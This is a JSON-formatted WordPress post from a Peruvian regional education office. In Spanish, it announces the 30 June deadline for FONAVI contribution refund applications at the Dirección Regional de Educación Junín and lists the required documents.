{"id":173,"date":"2025-06-07T02:06:39","date_gmt":"2025-06-07T02:06:39","guid":{"rendered":"https:\/\/ugelsatipo.gob.pe\/?p=173"},"modified":"2026-04-15T19:01:24","modified_gmt":"2026-04-15T19:01:24","slug":"drej-informa-tramites-para-devolucion-de-fonavi-sera-solo-hasta-el-30-de-junio","status":"publish","type":"post","link":"https:\/\/ugelsatipo.gob.pe\/index.php\/2025\/06\/07\/drej-informa-tramites-para-devolucion-de-fonavi-sera-solo-hasta-el-30-de-junio\/","title":{"rendered":"DREJ INFORMA TR\u00c1MITES PARA DEVOLUCI\u00d3N DE FONAVI SER\u00c1 SOLO HASTA EL 30 DE JUNIO"},"content":{"rendered":"<p>Desde la Direcci\u00f3n Regional de Educaci\u00f3n Jun\u00edn informaron que, todos los ex fonavistas podr\u00e1n presentar sus solicitudes para la devoluci\u00f3n de los aportes del Fondo Nacional de Vivienda (FONAVI), el mismo que se recepcionar\u00e1 en mesa de partes de la Direcci\u00f3n Regional de Educaci\u00f3n de Jun\u00edn, hasta el 30 de junio del presente a\u00f1o, siendo este un requisito indispensable para el inicio de tramite regular y registro en el SIFONAVI .<\/p>\n<p>Los ex fonavistas tendr\u00e1n que presentar estrictamente sus documentos cumpliendo los siguientes requisitos: 1.- Formulario \u00danico de Tramite (FUT) o solicitud, 2.- Copia del documento nacional de identidad (DNI), 3.- Resoluci\u00f3n directoral de nombramiento. 4.- Resoluci\u00f3n Directoral de reasignaciones, 5.- Resoluci\u00f3n directoral de cese (no se consigna si se encuentra en actividad) y 6.- Boletas de pago de los a\u00f1os 1980 a 1995.<\/p>\n<p>Los beneficiarios que tengan dudas o deseen mayor informaci\u00f3n podr\u00e1n realizarlas en la Direcci\u00f3n de Gesti\u00f3n Institucional de la Direcci\u00f3n Regional de Jun\u00edn, en el tercer piso con el personal responsable de FONAVI.<\/p>\n<p>Dato: El fondo FONAVI fue creado el 30 de junio de 1979 por el Decreto Ley N\u00b0 22591, para que los trabajadores dependientes e independientes pudieran comprar un terreno progresivamente con el aporte de una parte de su sueldo, y as\u00ed acceder a una vivienda.
